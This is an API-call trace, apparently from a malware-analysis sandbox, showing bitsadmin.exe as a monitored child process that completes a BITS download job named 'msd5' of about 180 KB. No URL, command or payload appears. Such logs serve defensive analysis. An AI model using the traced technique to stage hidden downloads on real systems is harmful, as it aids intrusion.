[0074.113] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2d8 | out: _Buffer="0") returned 1
[0074.113] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e4 | out: _Buffer="1") returned 1
[0074.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0074.114] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0x5) returned 1
[0074.114] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.114] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2bc | out: lpConsoleScreenBufferInfo=0x6f2bc) returned 1
[0074.114] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d4*=0x8) returned 1
[0074.115] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.115] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e0 | out: _Buffer="0") returned 1
[0074.115] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e4 | out: _Buffer="179712") returned 6
[0074.115] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e0 | out: _Buffer="0") returned 1
[0074.115] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f2cc | out: lpSystemTimeAsFileTime=0x6f2cc*(dwLowDateTime=0xdcc98630, dwHighDateTime=0x1d469c7))
[0074.115] _finite (_X=0x0) returned 1
[0074.115] _finite (_X=0x0) returned 1
[0074.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f28c | out: lpConsoleScreenBufferInfo=0x6f28c) returned 1
[0074.115] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x6f2a4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2a4*=0x11) returned 1
[0074.116] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.116] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f298 | out: lpConsoleScreenBufferInfo=0x6f298) returned 1
[0074.116] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f2b0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2b0*=0xf) returned 1
[0074.116] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.117] _vsnwprintf (in: _Buffer=0x6f0c4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x6f088 | out: _Buffer="0.00 B/S") returned 8
[0074.117] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2dc | out: lpConsoleScreenBufferInfo=0x6f2dc) returned 1
[0074.117] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2f4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2f4*=0x8) returned 1
[0074.117] CoTaskMemFree (pv=0x1083b8)
[0074.118] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 0
[0074.118] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fc78*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0074.604] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 1
[0074.604] TranslateMessage (lpMsg=0x6fc50) returned 0
[0074.604] DispatchMessageW (lpMsg=0x6fc50) returned 0x1
[0074.604] IBackgroundCopyCallback:JobModification (This=0x110c70, pJob=0xfa6ac, dwReserved=0x0) returned 0x0
[0074.604] IBackgroundCopyJob:GetState (in: This=0xfa61c, pVal=0x110c7c | out: pVal=0x110c7c) returned 0x0
[0074.604] KillTimer (hWnd=0x0, uIDEvent=0x7fbd) returned 1
[0074.604] IBackgroundCopyJob:GetType (in: This=0xfa61c, pVal=0x6f318 | out: pVal=0x6f318) returned 0x0
[0074.605] IBackgroundCopyJob:GetProgress (in: This=0xfa61c, pVal=0x110c80 | out: pVal=0x110c80) returned 0x0
[0074.606] IBackgroundCopyJob:GetPriority (in: This=0xfa61c, pVal=0x6f314 | out: pVal=0x6f314) returned 0x0
[0074.606] CoTaskMemFree (pv=0x0)
[0074.606] IBackgroundCopyJob:GetDisplayName (in: This=0xfa61c, pVal=0x6f32c | out: pVal=0x6f32c*="msd5") returned 0x0
[0074.607] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2d4 | out: lpConsoleScreenBufferInfo=0x6f2d4) returned 1
[0074.607] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6f2ec | out: lpNumberOfCharsWritten=0x6f2ec) returned 1
[0074.607] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6f2ec | out: lpNumberOfAttrsWritten=0x6f2ec) returned 1
[0074.607] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0074.608] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.608] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c0 | out: lpConsoleScreenBufferInfo=0x6f2c0) returned 1
[0074.608] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2d8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d8*=0xa) returned 1
[0074.608] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.609] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2bc | out: lpConsoleScreenBufferInfo=0x6f2bc) returned 1
[0074.609] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d4*=0x5) returned 1
[0074.609] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.609] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c4 | out: lpConsoleScreenBufferInfo=0x6f2c4) returned 1
[0074.609] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6f2dc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2dc*=0x7) returned 1
[0074.609] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.610] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b8 | out: lpConsoleScreenBufferInfo=0x6f2b8) returned 1
[0074.610] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d0*=0x8) returned 1
[0074.610] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.610] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c0 | out: lpConsoleScreenBufferInfo=0x6f2c0) returned 1
[0074.610] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d8*=0x8) returned 1
[0074.610] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.611] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0074.611] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0xe) returned 1
[0074.611] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.611] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2c4 | out: lpConsoleScreenBufferInfo=0x6f2c4) returned 1
[0074.611] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2dc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2dc*=0xa) returned 1
[0074.611] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.612] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2ac | out: lpConsoleScreenBufferInfo=0x6f2ac) returned 1
[0074.612] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6f2c4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2c4*=0xa) returned 1
[0074.612] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.612] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0074.612] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0x8) returned 1
[0074.612] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.613] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2d8 | out: _Buffer="0") returned 1
[0074.613] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e4 | out: _Buffer="1") returned 1
[0074.613] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2b4 | out: lpConsoleScreenBufferInfo=0x6f2b4) returned 1
[0074.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6f2cc, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2cc*=0x5) returned 1
[0074.613] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.613] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2bc | out: lpConsoleScreenBufferInfo=0x6f2bc) returned 1
[0074.613] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6f2d4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2d4*=0x8) returned 1
[0074.613] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.614] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e0 | out: _Buffer="39182") returned 5
[0074.614] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e4 | out: _Buffer="179712") returned 6
[0074.614] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6f2e0 | out: _Buffer="21") returned 2
[0074.614] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6f2cc | out: lpSystemTimeAsFileTime=0x6f2cc*(dwLowDateTime=0xdd15b230, dwHighDateTime=0x1d469c7))
[0074.614] _finite (_X=0x5acb6f46) returned 1
[0074.614] _finite (_X=0x18b66895) returned 1
[0074.614] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f28c | out: lpConsoleScreenBufferInfo=0x6f28c) returned 1
[0074.614] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x6f2a4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2a4*=0x16) returned 1
[0074.614] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.614] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f298 | out: lpConsoleScreenBufferInfo=0x6f298) returned 1
[0074.614] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x6f2b0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2b0*=0xf) returned 1
[0074.615] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.615] _vsnwprintf (in: _Buffer=0x6f0c4, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x6f088 | out: _Buffer="53.65 KB/S") returned 10
[0074.615] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f290 | out: lpConsoleScreenBufferInfo=0x6f290) returned 1
[0074.615] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x6f2a8, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2a8*=0xb) returned 1
[0074.615] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0074.615] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f298 | out: lpConsoleScreenBufferInfo=0x6f298) returned 1
[0074.615] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x6f2b0, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2b0*=0x10) returned 1
[0074.616] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0074.616] _vsnwprintf (in: _Buffer=0x6f0c4, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x6f07c | out: _Buffer="3 Seconds") returned 9
[0074.616] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6f2dc | out: lpConsoleScreenBufferInfo=0x6f2dc) returned 1
[0074.616] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x6f2f4, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6f2f4*=0x9) returned 1
[0074.616] CoTaskMemFree (pv=0x1083b8)
[0074.617] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 0
[0074.617] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x6fc78*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0075.182] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 1
[0075.182] TranslateMessage (lpMsg=0x6fc50) returned 0
[0075.182] DispatchMessageW (lpMsg=0x6fc50) returned 0x1
[0075.182] IBackgroundCopyCallback:JobTransferred (This=0x110c70, pJob=0xfa6ac) returned 0x0
[0075.182] IBackgroundCopyJob:GetState (in: This=0xfa61c, pVal=0x110c7c | out: pVal=0x110c7c) returned 0x0
[0075.182] IBackgroundCopyCallback:JobModification (This=0x110c70, pJob=0xfa6ac, dwReserved=0x0) returned 0x0
[0075.182] IBackgroundCopyJob:GetState (in: This=0xfa61c, pVal=0x110c7c | out: pVal=0x110c7c) returned 0x0
[0075.183] IBackgroundCopyJob:GetType (in: This=0xfa61c, pVal=0x6e288 | out: pVal=0x6e288) returned 0x0
[0075.184] IBackgroundCopyJob:GetProgress (in: This=0xfa61c, pVal=0x110c80 | out: pVal=0x110c80) returned 0x0
[0075.185] IBackgroundCopyJob:GetPriority (in: This=0xfa61c, pVal=0x6e284 | out: pVal=0x6e284) returned 0x0
[0075.185] CoTaskMemFree (pv=0x0)
[0075.185] IBackgroundCopyJob:GetDisplayName (in: This=0xfa61c, pVal=0x6e29c | out: pVal=0x6e29c*="msd5") returned 0x0
[0075.186] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e244 | out: lpConsoleScreenBufferInfo=0x6e244) returned 1
[0075.186] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6e25c | out: lpNumberOfCharsWritten=0x6e25c) returned 1
[0075.186] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6e25c | out: lpNumberOfAttrsWritten=0x6e25c) returned 1
[0075.187] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0075.187] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.187] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e230 | out: lpConsoleScreenBufferInfo=0x6e230) returned 1
[0075.187] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e248, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e248*=0xa) returned 1
[0075.187] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.188] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e22c | out: lpConsoleScreenBufferInfo=0x6e22c) returned 1
[0075.188] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e244, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e244*=0x5) returned 1
[0075.188] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.188] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e234 | out: lpConsoleScreenBufferInfo=0x6e234) returned 1
[0075.189] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6e24c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e24c*=0x7) returned 1
[0075.189] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.189] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e228 | out: lpConsoleScreenBufferInfo=0x6e228) returned 1
[0075.189] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e240, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e240*=0x8) returned 1
[0075.189] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.189] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e230 | out: lpConsoleScreenBufferInfo=0x6e230) returned 1
[0075.190] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e248, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e248*=0x8) returned 1
[0075.190] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.190] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e224 | out: lpConsoleScreenBufferInfo=0x6e224) returned 1
[0075.190] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x6e23c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e23c*=0xd) returned 1
[0075.190] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.190] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e234 | out: lpConsoleScreenBufferInfo=0x6e234) returned 1
[0075.191] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e24c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e24c*=0xa) returned 1
[0075.191] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.191] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e21c | out: lpConsoleScreenBufferInfo=0x6e21c) returned 1
[0075.191] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e234, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e234*=0xa) returned 1
[0075.191] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.191] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e224 | out: lpConsoleScreenBufferInfo=0x6e224) returned 1
[0075.192] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e23c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e23c*=0x8) returned 1
[0075.192] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.192] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e248 | out: _Buffer="1") returned 1
[0075.192] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e254 | out: _Buffer="1") returned 1
[0075.192] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e224 | out: lpConsoleScreenBufferInfo=0x6e224) returned 1
[0075.192] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e23c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e23c*=0x5) returned 1
[0075.192] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0075.192] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e22c | out: lpConsoleScreenBufferInfo=0x6e22c) returned 1
[0075.193] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e244, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e244*=0x8) returned 1
[0075.193] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.193] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e250 | out: _Buffer="179712") returned 6
[0075.193] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e254 | out: _Buffer="179712") returned 6
[0075.193] _vsnwprintf (in: _Buffer=0xa503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x6e250 | out: _Buffer="100") returned 3
[0075.193] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e24c | out: lpConsoleScreenBufferInfo=0x6e24c) returned 1
[0075.193] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x6e264, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e264*=0x16) returned 1
[0075.193] CoTaskMemFree (pv=0x1083b8)
[0075.194] IBackgroundCopyJob:Complete (This=0xfa61c) returned 0x0
[0075.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e250 | out: lpConsoleScreenBufferInfo=0x6e250) returned 1
[0075.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e224 | out: lpConsoleScreenBufferInfo=0x6e224) returned 1
[0075.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6e23c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e23c*=0x2) returned 1
[0075.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e224 | out: lpConsoleScreenBufferInfo=0x6e224) returned 1
[0075.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa443c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x6e23c, lpReserved=0x0 | out: lpBuffer=0xa443c4*, lpNumberOfCharsWritten=0x6e23c*=0x14) returned 1
[0075.407] GetCurrentThreadId () returned 0xd78
[0075.407] PostThreadMessageW (idThread=0xd78, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0075.407] PeekMessageW (in: lpMsg=0x6fc50, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6fc50) returned 1
[0075.407] IUnknown:Release (This=0xfa61c) returned 0x1
[0075.407] IUnknown:Release (This=0xfa544) returned 0x0
[0075.408] CoUninitialize ()
[0075.408] IUnknown:Release (This=0x110c70) returned 0x2
[0075.408] IUnknown:Release (This=0x110c70) returned 0x1
[0075.408] IUnknown:Release (This=0x110c70) returned 0x0
[0075.408] IUnknown:Release (This=0xfa61c) returned 0x1
[0075.408] CoTaskMemFree (pv=0x110c70)
[0075.411] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0075.411] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0075.412] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0075.412] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0075.412] CloseHandle (hObject=0x80) returned 1
[0075.412] exit (_Code=0)
Thread:
id = 175
os_tid = 0xd8c
Thread:
id = 176
os_tid = 0xd90
Thread:
id = 177
os_tid = 0xd94
Thread:
id = 178
os_tid = 0xd98
Process:
id = "18"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be600"
os_pid = "0xda4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
